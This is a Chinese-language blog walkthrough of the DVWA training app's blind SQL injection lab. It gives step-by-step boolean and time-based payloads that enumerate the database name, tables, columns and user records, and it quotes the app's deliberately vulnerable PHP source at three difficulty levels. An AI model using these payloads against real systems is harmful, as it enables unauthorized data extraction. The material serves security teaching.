7、DVWA——SQL盲注

已于 2023-09-21 09:13:27 修改
阅读量453 收藏
点赞数
分类专栏: DVWA 文章标签: sql 数据库
于 2023-09-13 15:45:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55202378/article/details/132839962
版权

文章目录

一、概述

  盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。

普通注入与盲注的区别:

  普通注入是可以根据报错提示,进行sql语句注入从而,直接爆出我们想要的信息,比如数据库版本、数据库名、用户名、操作系统版本等;而盲注只能通过多次猜测,从而猜解出有用信息。相对来说sql盲注更加考验安全人员的手注能力。

SQL盲注分类:

  • 布尔盲注
  • 时间盲注

二、low

2.1 通关思路(布尔盲注)

(1)判断是否存在SQL注入漏洞

在参数后面添加',来判断是否存在sql注入漏洞。

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

  • 引号被拼接到SQL语句中,由此可见,存在SQL注入漏洞。
  • 同时,此处只是返回ID值在不在数据库中,页面可由此分为True和False,因此,该SQL注入属于布尔盲注。

(2)判断属于数字型注入还是字符型注入

在这里插入图片描述

1+and+1=1+--+

注意:payload需要URL编码。

在这里插入图片描述

1+and+1=2+--+

在这里插入图片描述

两次页面返回一致,属于字符型注入。下一步判断闭合符号~

1'+and+1=1+--+

在这里插入图片描述

1'+and+1=2+--+

在这里插入图片描述

两次页面返回不一致,故该SQL注入漏洞属于字符型注入,且单引号闭合。

(3)判断结果集中的字段数

注意:order by是对查询结果中的某个字段进行排序,并不能说明表中含有几个字段。

1'+order+by+<数字>+--+

在这里插入图片描述
在这里插入图片描述

可知,该页面(表)存在两个字段。

(4)猜数据库名长度

因为盲注没有回显点,故不能使用union进行联合查询。使用length()函数来判断数据库名的长度。

1'+and+length(database())=1+--+

使用sniper进行爆破
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

由此,可知数据库名长度为4。

(5)猜数据库名

1'+and+ascii((substr(database(),<变量1>,1)))=<变量2>+--+

注:

  • substr(string, start, length):提取字串。start从1开始。
  • 大写英文的ASCII值范围:65-90
  • 小写英文的ASCII值范围:97-122
  • 变量1的范围在0-3

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

可以得知,数据库名第一个字母为d。
依次,可以得到整个数据名为dvwa。

(6)猜表的个数

1'+and+(select+count(table_name)+from+information_schema.tables+where+table_schema=database())=1+--+

同理,爆表个数
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

由此可见,数据库中存在两个表。

(7)猜第一个表名

1'+and+ascii(substr((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),0,1))=103+--+

注:limit 0,1 代表第一行数据;选第二行数据应该是limit 1,1
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

  • 第一个表名的第一个字母为g;
  • 同理,可以爆破出第一个表名为guestbook,第二个表名为users

(8)猜user表中的字段个数、每个字段的长度、名称

1)该表中的字段个数

1'+and+(select+count(column_name)+from+information_schema.columns+where+table_schema=database()+and+table_name='users')=8+--+

在这里插入图片描述

这里就不进行爆破了,最终可以得到:users表中含有8个字段。

2)猜第一个字段的长度

1'+and+length((select+column_name+from+information_schema.columns+where+table_name='users'+limit+0,1))=7+--+

注:

  • 猜第二个字段的长度就将limit 0,1改为limit 1,1,依此类推。

在这里插入图片描述

可知,第一个字段长度为7。

3)猜第一个字段的第一个字母

1'+and+ascii(substr((select+column_name+from+information_schema.columns+where+table_name='users'+limit+0,1),1,1))=117+--+

注:第一个字段的第二个字母就将limit+0,1),1,1改为limit+0,1),2,1

在这里插入图片描述

  • 按照上述思路,对user表中的每个字段进行爆破,最终可以得到每个字段名。
  • 可以知道users表中含有user和password两个字段。

(9)猜字段内容

1)以猜user字段的第一个字段值为例:

1'+and+length((select+user+from+dvwa.users+limit+0,1))=5+--+

在这里插入图片描述

可以得知,第一个字段值长度为5。

2)猜第一个字段值的首字母

1'+and+ascii(substr((select+user+from+dvwa.users+limit+0,1),1,1))=97+--+

在这里插入图片描述

可以得到第一个字母为a。用同样的方法得到整个字段值。

2.2 通关思路(时间盲注)

(1)判断是否存在SQL注入漏洞,属于字符型还是数字型

1+and+sleep(5)+--+ //数字型则等待5秒;
1'+and+sleep(5)+--+ //字符型则等待5秒;

在这里插入图片描述
在这里插入图片描述

故,此处存在SQL注入漏洞,且属于字符型注入,单引号闭合。

(2)猜测当前数据库名长度、首字母

1)猜测数据库名长度

需要用到的函数if(a,b,c):a是条件,满足返回b,不满足返回c

1'+and+if(length(database())=4,sleep(5),1)+--+

在这里插入图片描述

延迟5秒,说明数据库名的长度为4。

2)猜测数据库名的首字母

1'+and+if(ascii((substr(database(),1,1)))=100,sleep(5),1)+--+

在这里插入图片描述

  • 延迟5秒,说明首字母的ascii值为100;
  • 注意此时页面会报错嗷~
  • 后续步骤同布尔盲注,无非是加了一个if函数。

2.3 源码分析

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Get input
    $id = $_GET[ 'id' ];

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysql_numrows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    mysql_close();
}

?>

分析:
  源码直接用 GET 方法传入参数 id,但是没有经过任何过滤就拿去 SQL 查询了。同时我们看到网页并不会返回查询的结果,而是当查询到内容时返回 “User ID exists in the database”,查不到时返回 “User ID is MISSING from the database”。

三、medium


<?php

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $id = $_POST[ 'id' ];
    $id = mysql_real_escape_string( $id );

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysql_numrows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    //mysql_close();
}

?>

分析:源码使用了 mysql_real_escape_string() 函数转义字符串中的特殊字符。也就是说特殊符号 \x00\n\r\'"\x1a 都将进行转义。同时开发者把前端页面的输入框删了,改成了下拉选择表单,希望以此来控制用户的输入。

需要注意的是,加单引号,页面返回报错,可能会误判。例如,正常是查id等于1的用户,转义后就会去查id等于1\'的用户,显然数据库没有。故,注意可能会误判。

在这里插入图片描述

四、high

<?php

if( isset( $_COOKIE[ 'id' ] ) ) {
    // Get input
    $id = $_COOKIE[ 'id' ];

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysql_numrows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // Might sleep a random amount
        if( rand( 0, 5 ) == 3 ) {
            sleep( rand( 2, 4 ) );
        }

        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    mysql_close();
}

?>

分析:High 级别的只是在 SQL 查询语句中添加了 LIMIT 1,这令服务器仅回显查询到的一个结果。同时源码利用了 cookie 传递参数 id,当 SQL 查询结果为空时会执行函数 sleep(),这是为了混淆基于时间的盲注的响应时间判断。

PT_silver
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA靶场SQL注入
剁椒鱼头没剁椒的博客
12-13 5764
但输入-1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=“users”#的时候在2号位显示出很多的列,我们就看其中的user和password。4)联合查询判断可显示的注入点,当输入-1’ union select 1,2# 就能够显示1和2在的位置。2)输入1 and 1=2#正常,但是当输入1’ and 1=2#不正常,那么证明可以判断字符注入。
DVWASQL注入盲注
天空之蓝的博客
11-17 2430
SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。手工盲注的过程,就像你与一个机器人聊天,这个机器人知道的很多,但只会回答“是”或者“不是”,因此你需要询问它这样的问题,例如“数据库名字的第一个字母是不是a啊?”,通过这种机械的询问,最终获得你想要的数据。
DVWA】20. SQL Injection (Blind)SQL注入盲注(全等级Sqlmap版)
最新发布
Zichel77的博客
04-08 1233
盲注,有两种主要类,包括布尔盲注和时间盲注
DVWA——SQL盲注(全等级)
@一只躺平的猪@的博客
07-13 5390
SQL盲注与一般注入的区别在于:一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知。一般有两种方式:布尔和时间。还有一种是报错注入,本章主要介绍布尔盲注。布尔是根据页面是否正确显示来判断我们构造的语句是否正确执行时间则是根据页面加载时间是否变化来判断的。SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(
DVWA盲注详解
qq_45788625的博客
04-18 6488
low等级DVWA盲注详解
DVWA------SQL Injection (Blind)(SQL盲注
m0_65712192的博客
12-09 2659
DVWA------SQL Injection (Blind)(SQL盲注
Kali渗透测试之DVWA系列(四)——使用Burp Suite进行SQL Injection(Blind)(SQL盲注,包括盲注脚本)
weixin_45116657的博客
08-25 4337
目录: 一、SQL盲注 SQL盲注SQL注入的区别; SQL盲注的过程; 二、实验环境 三、实验过程 基于布尔值的盲注; 基于时间的盲注; 一、SQL盲注简介 1、SQL盲注盲注SQL Injection(Blind),即SQL盲注,目标只会回复是或不是,没有详细内容; 注入:可以查看详细的内容 2、手工盲注思路: 手工盲注的过程,就像你和机器人聊天一样,这个机器人知道的...
DVWASQL Injection Blind(SQL盲注
RexHa的博客
10-04 2188
DVWA sql盲注
利用dvwa靶场深度学习sql注入攻击
hcufo的博客
01-18 250
sql注入详细过程及总结
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
SQL盲注medium.pdf
05-13
本文档主要讲解SQL盲注的技术,使用DVWA Security平台进行演示,难度设置为medium。下面我们将对每一步操作进行详细的解释和知识点总结。 一、DVWA Security平台的使用 DVWA Security是一个开源的Web应用安全测试...
DVWASQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
适合DVWASQL-li-lab的PHPStudy、DVWASQL-li-labs
03-26
免费的工具包,下载安装配置好即可使用,给个小赞吧。
网络安全原理与应用:SQL盲注.pptx
05-16
掌握在DVWA平台上进行SQL盲注的方法; SQL盲注 一、SQL盲注 SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连...
dvwa靶场sql注入low
qq_14902381的博客
08-22 395
dvwa 靶场sql注入low
DVWA靶场-SQL Injection (Blind)SQL注入盲注
mlws1900的博客
03-19 1300
直接使用报错:' union select 1,count(*),concat('/',(select @@datadir),'/',floor(rand(0)*2))a from information_schema.columns group by a--+盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。length:正整数,指定将从左边返回的字符数。
DVWA--SQL Injection (盲注)--四个级别
1stPeak's Blog
10-29 1611
SQL盲注,其实和SQL注入差不多,只是比它难一点利用,注入时返回的数据只有正确和错误,并不会返回其他信息 索引目录: Low Medium High Impossible ASCII标准表 Low 源代码: <?php if( isset( $_GET[ 'Submit' ] ) ) { // Get input ...
DVWAsql盲注
qq_39670065的博客
08-08 2807
写在前面: 当时刷sqli-labs也浑浑噩噩没有做啥总结,现在就先从sql盲注总结开始吧 SQL Injection(Blind) SQL盲注与一般注入的区别在于:一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知 sql盲注又分为布尔盲注,时间盲注和基于报错的盲注 理论上,能够布尔盲注就一定能时间盲注,能够时间盲注不一定能布尔盲注。相比之下,布尔盲注稳定性更好,时间盲注适用范围更广,但因为时间盲注的实现原理是基
dvwa sql盲注高级
08-11
DVWA(Damn Vulnerable Web Application)是一个用于练习 Web 安全技术的漏洞应用程序。其中包含了多个不同类的漏洞,包括 SQL 盲注SQL 盲注是一种利用 Web 应用程序中存在SQL 注入漏洞来获取数据库信息的攻击技术。在 DVWA 中,你可以通过以下步骤进行 SQL 盲注的高级练习: 1. 登录 DVWA:在浏览器中访问 DVWA,并使用提供的用户名和密码登录。 2. 寻找 SQL 注入点:在 DVWA 中,你需要找到存在 SQL 注入漏洞的输入点。这可以是登录表单、搜索框或其他用户输入的地方。 3. 确定数据库和表名:使用不正确的输入来尝试触发错误,并尝试从错误消息中获取有关数据库和表名的信息。这可以帮助你构建有效的注入语句。 4. 构造注入语句:根据你获取到的数据库和表名信息,构造有效的注入语句。在高级盲注中,你可能需要使用一些技巧来绕过过滤和限制。 5. 判断注入结果:通过观察应用程序的响应,判断你的注入语句是否成功执行。你可以观察页面内容、错误消息或应用程序的行为变化。 6. 提取数据:如果注入成功执行,你可以使用 UNION SELECT 或其他技术来提取数据库中的数据。通过逐渐调整注入语句,你可以获取更多敏感信息。 请注意,在进行 DVWA 或任何其他漏洞练习时,遵守法律和道德规范。仅在授权的环境中进行测试,不要攻击未经授权的系统。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值